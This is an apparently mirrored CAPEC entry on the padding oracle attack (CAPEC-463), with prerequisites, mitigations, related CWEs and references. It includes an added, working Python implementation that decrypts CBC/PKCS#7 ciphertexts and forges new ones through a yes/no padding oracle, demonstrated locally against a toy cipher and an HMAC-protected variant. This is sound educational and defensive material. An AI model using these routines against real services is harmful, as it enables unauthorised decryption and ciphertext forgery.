CAPEC-463

Padding Oracle Crypto Attack
High
Draft
2014-06-23 00:00 +00:00
2022-02-22 00:00 +00:00

CAPEC Description

An adversary can efficiently decrypt data without knowing the decryption key if the target system leaks whether a padding error occurred while decrypting a ciphertext. A system that leaks this information becomes a padding oracle. By querying it, the adversary recovers each ciphertext block with on average 128*b oracle calls (where b is the number of bytes in a block), because every byte is recovered independently with at most 256 and on average 128 guesses. Beyond decryption, the same oracle lets the adversary produce valid ciphertexts for plaintext of their choosing (i.e., perform encryption), again without knowing the key.

CAPEC Information

Prerequisites

The decryption routine does not authenticate the message (verify its integrity) before performing the decryption operation.
The target system leaks, in some observable way, whether a padding error occurred when attempting to decrypt the ciphertext.
The padding oracle remains available for as long, and for as many requests, as the adversary needs to decrypt the ciphertext.

Resources Required

Mitigations

Design: Use a message authentication code (MAC) or another integrity mechanism (for example an authenticated encryption mode) and verify message authenticity before decryption, rejecting any ciphertext that fails verification without ever decrypting it.
Implementation: Do not leak information back to the user about cryptographic errors (e.g., padding errors) encountered during decryption. Any observable difference between a padding failure and any other decryption failure, whether an error message, status code, response size or response time, is an oracle; failures must be reported uniformly.
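The attack from the description and the two mitigations above, as an added worked example that is not part of CAPEC or the cited paper. It assumes CBC mode with PKCS#7 padding and a service that answers "valid" or "invalid padding" for arbitrary (iv, ciphertext) pairs. The 16-byte Feistel block cipher is a stdlib stand-in for AES, chosen only so the example runs offline; the class and function names, the sample messages and the domain-separated HMAC key are all assumptions made here.

```python
import hashlib
import hmac
import os

BLOCK = 16  # bytes

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in 16-byte block cipher (an assumption standing in for AES so the example runs on
# the stdlib): an 8-round Feistel network with an HMAC-SHA256 round function. The attack
# never looks inside it; only CBC chaining, PKCS#7 and the oracle's yes/no matter.
def feistel(key, block, decrypt=False):
    def f(rnd, half): return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]
    l, r = block[:8], block[8:]
    for rnd in (range(7, -1, -1) if decrypt else range(8)):
        l, r = (xor(r, f(rnd, l)), l) if decrypt else (r, xor(l, f(rnd, r)))
    return l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out = [iv]
    for i in range(0, len(padded), BLOCK):
        out.append(feistel(key, xor(out[-1], padded[i:i + BLOCK])))
    return b"".join(out[1:])

def cbc_decrypt(key, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(p, feistel(key, c, decrypt=True)) for p, c in zip(blocks, blocks[1:]))

class PaddingOracle:
    # Vulnerable service: decrypts unauthenticated input, then reveals whether padding was valid.
    def __init__(self, key):
        self.key, self.calls = key, 0

    def __call__(self, iv, ct):
        self.calls += 1
        try:
            unpad(cbc_decrypt(self.key, iv, ct))
            return True
        except ValueError:
            return False

class AuthenticatedOracle(PaddingOracle):
    # Mitigated: constant-time HMAC over iv||ct checked BEFORE decrypting; tampering fails uniformly.
    def __call__(self, iv, ct, tag=b""):
        expected = hmac.new(self.key, b"mac" + iv + ct, hashlib.sha256).digest()
        return hmac.compare_digest(expected, tag) and super().__call__(iv, ct)

def recover_intermediate(oracle, target):  # feistel(key, target, decrypt=True) without the key
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):  # last byte first, ~128 oracle calls per byte
        padval = BLOCK - pos
        prev = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):  # bytes already recovered: force them to padval
            prev[j] = inter[j] ^ padval
        for guess in range(256):
            prev[pos] = guess
            if not oracle(bytes(prev), target):
                continue
            if pos == BLOCK - 1:  # accepted as \x01, or as a longer run such as \x02\x02?
                prev[pos - 1] ^= 0xFF  # disturb byte 14: only a genuine \x01 still passes
                if not oracle(bytes(prev), target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle accepted nothing: no padding oracle here")
    return bytes(inter)

def oracle_decrypt(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(xor(p, recover_intermediate(oracle, c)) for p, c in zip(blocks, blocks[1:])))

def oracle_encrypt(oracle, plaintext):  # forge (iv, ct) for a chosen plaintext, last block first
    padded, chain = pad(plaintext), [bytes(BLOCK)]  # any final block will do
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        chain.insert(0, xor(recover_intermediate(oracle, chain[0]), padded[i:i + BLOCK]))
    return chain[0], b"".join(chain[1:])

def demo(msg=b"user=alice;role=user", forge=b"user=alice;role=admin"):  # constructed inputs
    key, iv = os.urandom(32), os.urandom(BLOCK)
    ct, weak = cbc_encrypt(key, iv, pad(msg)), PaddingOracle(key)
    recovered, (iv2, ct2) = oracle_decrypt(weak, iv, ct), oracle_encrypt(weak, forge)
    try:
        oracle_decrypt(AuthenticatedOracle(key), iv, ct)
        blocked = False
    except RuntimeError:  # the MAC check fails uniformly, so nothing is ever accepted
        blocked = True
    return recovered, unpad(cbc_decrypt(key, iv2, ct2)), weak.calls, blocked
```

`demo()` recovers the plaintext and forges a ciphertext for a different plaintext using only the weak oracle's yes/no answers, at roughly 128 calls per byte and per block, and shows the same attack getting nowhere against the oracle that verifies an HMAC first. Two things are deliberately simplified: the MAC key is derived from the encryption key by domain separation (use independent keys, or an AEAD mode, in production), and "fails uniformly" in real code also means no timing difference between a MAC failure and any other rejection.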

Related Weaknesses

CWE-ID Weakness Name

CWE-209

Generation of Error Message Containing Sensitive Information
The product generates an error message that includes sensitive information about its environment, users, or associated data.

CWE-514

Covert Channel
A covert channel is a path that can be used to transfer information in a way not intended by the system's designers.

CWE-649

Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking
The product uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the product does not use integrity checks to detect if those inputs have been modified.

CWE-347

Improper Verification of Cryptographic Signature
The product does not verify, or incorrectly verifies, the cryptographic signature for data.

CWE-354

Improper Validation of Integrity Check Value
The product does not validate or incorrectly validates the integrity check values or "checksums" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.

CWE-696

Incorrect Behavior Order
The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways that may produce resultant weaknesses.

References

REF-400

Practical Padding Oracle Attacks
Juliano Rizzo, Thai Duong.
https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf

Submission

Name Organization Date Release Date
CAPEC Content Team The MITRE Corporation 2014-06-23 +00:00

Modifications

Name Organization Date Comment
CAPEC Content Team The MITRE Corporation 2017-08-04 +00:00 Updated Attack_Prerequisites, Description Summary
CAPEC Content Team The MITRE Corporation 2018-07-31 +00:00 Updated References
CAPEC Content Team The MITRE Corporation 2020-07-30 +00:00 Updated Related_Attack_Patterns
CAPEC Content Team The MITRE Corporation 2020-12-17 +00:00 Updated Description, Example_Instances, Mitigations
CAPEC Content Team The MITRE Corporation 2022-02-22 +00:00 Updated Description, Extended_Description